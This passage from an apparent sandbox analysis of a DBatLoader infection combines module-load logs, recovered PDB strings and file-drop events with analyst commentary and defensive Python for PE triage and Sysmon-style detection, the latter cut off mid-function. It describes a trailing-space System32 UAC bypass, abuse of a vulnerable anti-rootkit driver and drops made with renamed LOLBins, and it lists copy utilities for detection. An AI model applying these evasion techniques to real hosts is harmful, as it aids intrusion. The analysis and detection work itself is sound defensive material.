Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: rasadhlp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: winhttpcom.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: webio.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ???.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ???.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ???.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ????.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: spp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: spp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: spp.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: slc.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\AnyDesk.PIF | Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\esentutl.exe | Section loaded: esent.dll
Source: C:\Windows\SysWOW64\esentutl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\esentutl.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: atlthunk.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: mmdevapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: ksuser.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: avrt.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: audioses.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: midimap.dll
          Source: C:\Users\Public\Libraries\AnyDesk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: A1 igazol#U00e1s.cmdStatic file information: File size 3839564 > 1048576
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdbGCTL source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
          Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1446334242.00000000029F1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.00000000219CF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535026723.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.0000000021A00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: SndVol.pdb source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp

What the recovered PDB paths tell an analyst: cmd.pdb in alpha.exe/alpha.pif and certutil.pdb in kn.exe confirm that these drops are unmodified copies of cmd.exe and certutil.exe under new names, so the static and heuristic signatures that fire on them further down (compile timestamp, section names, FindFirstFile loops, SetUnhandledExceptionFilter) describe Microsoft code rather than the loader. easinvoker.pdb appears only in AnyDesk.PIF memory; easinvoker.exe is the auto-elevating Microsoft binary that DBatLoader stages in a mock "C:\Windows \System32" directory (note the trailing space) for its UAC bypass, which is the behaviour behind the Sigma hit for DLL search-order hijacking via an additional space in the path. truesight.pdb is the Adlice Truesight anti-rootkit driver; that driver has been abused as a bring-your-own-vulnerable-driver component to terminate security products, so its presence in loader memory warrants a separate check for driver loads and service creation on the host. SndVol.pdb and msdt.pdb in explorer.exe and msdt.exe memory are consistent with the hollowing chain listed in the overview (SndVol.exe as the first hollowed host, then explorer.exe, then msdt.exe).

          Data Obfuscation

Source: Yara match -> File source: 10.2.AnyDesk.PIF.2d40000.0.unpack, type: UNPACKEDPE
Source: Yara match -> File source: 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: alpha.exe.3.dr -> Static PE information: compile timestamp 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Caveat: alpha.exe is a renamed cmd.exe (cmd.pdb above). Since Windows 10, Microsoft builds are reproducible and the PE TimeDateStamp holds a hash of the build rather than a build time, so a timestamp decades in the future on a Windows system binary is expected and is not evidence of header tampering. On a third-party sample the same value would be a real indicator.
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D5894C (API resolved by name at run time instead of through the import table)
Source: alpha.exe.3.dr -> Static PE information: section name: .didat
Source: kn.exe.5.dr -> Static PE information: section name: .didat
Source: alpha.pif.16.dr -> Static PE information: section name: .didat
Caveat: .didat is the delay-load import section emitted by the Microsoft linker; it is standard in cmd.exe and certutil.exe and is not a packer artefact.
Source: C:\Users\Public\kn.exe -> Code function: 7_2_00007FF685443668 push rsp; ret 7_2_00007FF685443669
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D6D2FC push 02D6D367h; ret 10_2_02D6D35F
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D463B0 push 02D4640Bh; ret 10_2_02D46403
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D463AE push 02D4640Bh; ret 10_2_02D46403
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D4C349 push 8B02D4C1h; ret 10_2_02D4C34E
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D6C378 push 02D6C56Eh; ret 10_2_02D6C566
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D4332C push eax; ret 10_2_02D43368
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D6D0AC push 02D6D125h; ret 10_2_02D6D11D
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5306C push 02D530B9h; ret 10_2_02D530B1
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5306B push 02D530B9h; ret 10_2_02D530B1
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D6D1F8 push 02D6D288h; ret 10_2_02D6D280
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D6D144 push 02D6D1ECh; ret 10_2_02D6D1E4
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5F108 push ecx; mov dword ptr [esp], edx 10_2_02D5F10D
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D46784 push 02D467C6h; ret 10_2_02D467BE
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D46782 push 02D467C6h; ret 10_2_02D467BE
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D4D5A0 push 02D4D5CCh; ret 10_2_02D4D5C4
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D6C570 push 02D6C56Eh; ret 10_2_02D6C566
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D4C56C push ecx; mov dword ptr [esp], edx 10_2_02D4C571
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5AADF push 02D5AB18h; ret 10_2_02D5AB10
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D58AD8 push 02D58B10h; ret 10_2_02D58B08
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5AAE0 push 02D5AB18h; ret 10_2_02D5AB10
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D4CA1F push 02D4CD72h; ret 10_2_02D4CD6A
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D4CBEC push 02D4CD72h; ret 10_2_02D4CD6A
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02DB4850 push eax; ret 10_2_02DB4920
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5886C push 02D588AEh; ret 10_2_02D588A6
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D56946 push 02D569F3h; ret 10_2_02D569EB
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D56948 push 02D569F3h; ret 10_2_02D569EB
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D5790C push 02D57989h; ret 10_2_02D57981
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D55E7C push ecx; mov dword ptr [esp], edx 10_2_02D55E7E
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02D52F60 push 02D52FD6h; ret 10_2_02D52FCE
Source: C:\Users\Public\Libraries\AnyDesk.PIF -> Code function: 10_2_02AEE683 push ecx; retf 10_2_02AEE69A
Reading the list: the push imm32 / ret pairs are returns to a pushed constant inside the AnyDesk.PIF image (0x02D4xxxx to 0x02DBxxxx), i.e. indirect jumps that a linear disassembler does not see as control-flow edges. The push ecx; mov dword ptr [esp], edx sequences are ordinary Delphi compiler prologues, consistent with DBatLoader being Delphi code, and are not obfuscation on their own.
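The three static observations in this section (compile timestamp, section names, push/ret pairs) are cheap to reproduce outside the sandbox. The script below is an added example written for this page, not Joe Sandbox code and nothing taken from the sample: it parses a PE header with the standard library, converts TimeDateStamp and flags a value that lies in the future, lists section names so a lone .didat hit can be recognised as a delay-load section, and scans each section for push imm32 immediately followed by ret where the pushed value falls inside the image. The image base 0x02D40000 and the opcode bytes are constructed to mirror the report's addresses (the report's own push/ret pairs have other instructions between push and ret, which a wider window would catch); the minimal PE builder exists only so the example runs offline.

```python
import struct
import datetime as dt

PE32, PE32PLUS = 0x10B, 0x20B


def parse_pe(data: bytes):
    """Return (TimeDateStamp, image_base, size_of_image, [(name, va, raw_bytes)])."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (no MZ)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic")
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    sections = []
    for i in range(nsec):
        name, _, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, data[raw_ptr:raw_ptr + raw_size]))
    return timestamp, image_base, size_of_image, sections


def find_push_ret(code: bytes, base: int, lo: int, hi: int):
    """(address, target) for every `push imm32; ret` (68 xx xx xx xx C3) whose target is in [lo, hi)."""
    hits = []
    for i in range(len(code) - 5):
        if code[i] == 0x68 and code[i + 5] == 0xC3:
            target = struct.unpack_from("<I", code, i + 1)[0]
            if lo <= target < hi:
                hits.append((base + i, target))
    return hits


def triage(data: bytes, now=None) -> dict:
    now = now or dt.datetime.now(dt.timezone.utc)
    timestamp, image_base, size_of_image, sections = parse_pe(data)
    built = dt.datetime.fromtimestamp(timestamp, dt.timezone.utc)
    names = [s[0] for s in sections]
    hits = []
    for _, va, raw in sections:
        hits += find_push_ret(raw, image_base + va, image_base, image_base + size_of_image)
    return {
        "timestamp": built.isoformat(),
        # A future timestamp hints at tampering on third-party code, but Microsoft's
        # reproducible builds store a hash here, so a renamed cmd.exe trips this too.
        "timestamp_in_future": built > now,
        "sections": names,
        # .didat is the MSVC delay-load import section, normal in Windows binaries.
        "has_delay_import_section": ".didat" in names,
        "push_ret": hits,
    }


def build_sample_pe(timestamp: int, code: bytes, image_base: int = 0x02D40000) -> bytes:
    """Constructed minimal PE32 used only to exercise the functions above (not a real drop)."""
    e_lfanew, opt_size, raw_ptr = 0x40, 0xE0, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, timestamp, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 56, 0x100000)          # SizeOfImage

    def section(name, va, raw, ptr):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), ptr, 0, 0, 0, 0, 0x60000020)

    hdr = dos + coff + bytes(opt) + section(b".text", 0x1000, code, raw_ptr) + section(b".didat", 0x2000, b"", 0)
    return hdr + b"\0" * (raw_ptr - len(hdr)) + code


# Constructed .text bytes: an in-image push/ret (target 0x02D6D367, as in the report), a
# push/ret whose target is outside the image (ignored), and a Delphi-style
# `push ecx; mov [esp], edx; ret` that is not a push/ret pair.
SAMPLE_CODE = bytes.fromhex("68 67 d3 d6 02 c3 " "68 78 56 34 12 c3 " "51 89 14 24 c3")
SAMPLE_PE = build_sample_pe(0xE1CBFC53, SAMPLE_CODE)

if __name__ == "__main__":
    for key, value in triage(SAMPLE_PE).items():
        print(f"{key}: {value}")
```

Run against the real alpha.exe the timestamp line reproduces the report's 2090 date; the decision is then the analyst's, using the PDB path and the Authenticode signature rather than the timestamp alone.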

          Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe -> File created: C:\Users\Public\alpha.pif
Source: C:\Users\Public\kn.exe -> File created: C:\Users\Public\Libraries\AnyDesk.PIF
Source: C:\Windows\System32\extrac32.exe -> File created: C:\Users\Public\alpha.exe
Source: C:\Windows\System32\extrac32.exe -> File created: C:\Users\Public\kn.exe
All four writes are performed by signed Microsoft binaries: extrac32.exe (the CAB extraction utility) produces alpha.exe and kn.exe, esentutl.exe produces alpha.pif, and kn.exe, itself a renamed certutil.exe (certutil.pdb above), writes the final AnyDesk.PIF stage into C:\Users\Public\Libraries. File-creation telemetry therefore attributes every drop to a trusted image; what stands out is the combination of writer, destination (the world-writable Public profile) and extension (a .pif file that is really a PE executes like an .exe).
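The drop chain above is exactly what endpoint telemetry can catch before any payload runs. The rules below are an added example for this page (not Joe Sandbox's Sigma rules and not the product's code): they evaluate Sysmon-style records using the real Sysmon field names (EventID 11 FileCreate with Image and TargetFilename; EventID 1 ProcessCreate with Image, ParentImage and OriginalFileName, the latter taken from the binary's version resource) and flag the same combinations the report lists: a copy/extract utility writing an executable into C:\Users\Public, a .pif executable, a process whose OriginalFileName does not match the name it runs under, and execution or parentage from the Public profile. The events are constructed from the file-creation lines above; the parent images and the LOLBin set are assumptions, not values from the report.

```python
import ntpath

PUBLIC = "c:\\users\\public\\"
EXEC_EXT = {".exe", ".pif", ".com", ".scr"}
# Microsoft utilities that copy or extract files on behalf of a caller (assumed set; extend as needed).
COPY_LOLBINS = {"extrac32.exe", "esentutl.exe", "expand.exe", "certutil.exe"}


def _under_public(path: str) -> bool:
    return path.lower().startswith(PUBLIC)


def _is_exec(path: str) -> bool:
    return ntpath.splitext(path)[1].lower() in EXEC_EXT


def rules_for(ev: dict) -> list:
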